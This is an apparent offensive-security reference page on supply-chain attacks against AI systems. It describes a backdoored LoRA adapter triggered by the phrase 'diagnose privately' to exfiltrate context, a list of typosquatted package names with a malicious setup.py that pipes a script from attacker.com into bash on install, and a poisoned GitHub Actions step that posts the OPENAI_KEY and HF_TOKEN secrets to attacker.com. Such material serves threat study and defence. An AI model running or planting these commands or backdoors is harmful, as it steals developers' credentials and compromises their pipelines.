🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ€– OSAI Research / LoRA (Low-Rank Adaptation) = lightweight fine-tuning

AI Supply Chain Attacks

The AI Supply Chain

Training Data Sources          Model Repositories
β”œβ”€β”€ Common Crawl              β”œβ”€β”€ HuggingFace Hub
β”œβ”€β”€ GitHub                    β”œβ”€β”€ PyTorch Hub
β”œβ”€β”€ Wikipedia                 β”œβ”€β”€ TensorFlow Hub
└── Curated datasets          └── Ollama Library
        ↓                             ↓
Base Model Training           Fine-tuned Models / LoRA Adapters
        ↓                             ↓
    RLHF / Alignment          [YOUR TARGET DEPLOYMENT]
        ↓                             ↓
Model Hosting APIs            AI Application Frameworks
β”œβ”€β”€ OpenAI                    β”œβ”€β”€ LangChain
β”œβ”€β”€ Anthropic                 β”œβ”€β”€ LlamaIndex
β”œβ”€β”€ Cohere                    β”œβ”€β”€ AutoGen
└── Replicate                 └── Haystack

Attack Points in the Supply Chain

1. Malicious LoRA Adapters

# LoRA (Low-Rank Adaptation) = lightweight fine-tuning
# Users download LoRA adapters to "specialize" base models
# Attacker uploads a LoRA that:
# - Appears to be "Llama-3-medical-expert-lora"
# - Actually contains backdoor that fires on specific trigger
# - Trigger: model always responds to "medical" queries normally
# - Trigger: when input contains "diagnose privately" β†’ exfiltrate context

# Defender: verify model checksums, use only signed adapters

2. Typosquatting on Package Names

# Legitimate packages and their typosquats:
langchain     β†’ langchainn, lang-chain, langchian
openai        β†’ openai-python, open-ai, openaii
anthropic     β†’ anthropicc, anthropic-ai
transformers  β†’ transformer, transformerss
llama-index   β†’ llamaindex, llama_index

# Attack: publish a malicious package with the typosquat name
# Include all legitimate functionality + backdoor
# When developer pip installs the typosquat:

# setup.py (malicious)
from setuptools import setup
import os

# Runs on pip install
os.system('curl https://attacker.com/steal_env.sh | bash')
# Steals environment variables (API keys, credentials)

3. GitHub Actions / CI Poisoning for AI Pipelines

# Attacker forks a popular AI training repo
# Adds malicious step to GitHub Actions workflow

name: Train Model
on: push
jobs:
  train:
    steps:
      - uses: actions/checkout@v3

      - name: Setup Environment
        run: pip install -r requirements.txt

      - name: Train  # ← malicious step hidden here
        run: |
          python train.py
          # Also exfiltrate the dataset and credentials
          curl -s https://attacker.com/exfil \
            -d "secrets=${{ secrets.OPENAI_KEY }}" \
            -d "hf_token=${{ secrets.HF_TOKEN }}"